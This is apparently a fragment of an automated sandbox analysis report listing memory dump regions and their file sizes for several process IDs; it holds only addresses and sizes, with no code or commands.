                                                          • memory/2548-257-0x00007FF9EDF60000-0x00007FF9EDF93000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/2548-268-0x00007FF9EB3A0000-0x00007FF9EB46D000-memory.dmp

                                                            Filesize

                                                            820KB

                                                          • memory/2548-269-0x00007FF9E61D0000-0x00007FF9E66F0000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/2548-270-0x0000026D97060000-0x0000026D97580000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/2548-286-0x00007FF9EF000000-0x00007FF9EF023000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/2548-287-0x00007FF9F4740000-0x00007FF9F474F000-memory.dmp

                                                            Filesize

                                                            60KB

                                                          • memory/2548-295-0x00007FF9EB3A0000-0x00007FF9EB46D000-memory.dmp

                                                            Filesize

                                                            820KB

                                                          • memory/2548-294-0x00007FF9EDF60000-0x00007FF9EDF93000-memory.dmp

                                                            Filesize

                                                            204KB

                                                          • memory/2548-296-0x00007FF9EEFB0000-0x00007FF9EEFC4000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/2548-292-0x00007FF9F04D0000-0x00007FF9F04E9000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/2548-291-0x00007FF9EAB40000-0x00007FF9EACB7000-memory.dmp

                                                            Filesize

                                                            1.5MB

                                                          • memory/2548-290-0x00007FF9EDFA0000-0x00007FF9EDFC3000-memory.dmp

                                                            Filesize

                                                            140KB

                                                          • memory/2548-289-0x00007FF9F0630000-0x00007FF9F0649000-memory.dmp

                                                            Filesize

                                                            100KB

                                                          • memory/2548-288-0x00007FF9EEFD0000-0x00007FF9EEFFD000-memory.dmp

                                                            Filesize

                                                            180KB

                                                          • memory/2548-282-0x00007FF9E61D0000-0x00007FF9E66F0000-memory.dmp

                                                            Filesize

                                                            5.1MB

                                                          • memory/2548-271-0x00007FF9EACC0000-0x00007FF9EB2A9000-memory.dmp

                                                            Filesize

                                                            5.9MB

                                                          • memory/2548-285-0x00007FF9EA620000-0x00007FF9EA73C000-memory.dmp

                                                            Filesize

                                                            1.1MB

                                                          • memory/2548-284-0x00007FF9F3FC0000-0x00007FF9F3FCD000-memory.dmp

                                                            Filesize

                                                            52KB

                                                          • memory/2548-283-0x00007FF9EEFB0000-0x00007FF9EEFC4000-memory.dmp

                                                            Filesize

                                                            80KB

                                                          • memory/4308-177-0x0000018FF9110000-0x0000018FF9118000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/5884-91-0x000001E4F4650000-0x000001E4F4672000-memory.dmp

                                                            Filesize

                                                            136KB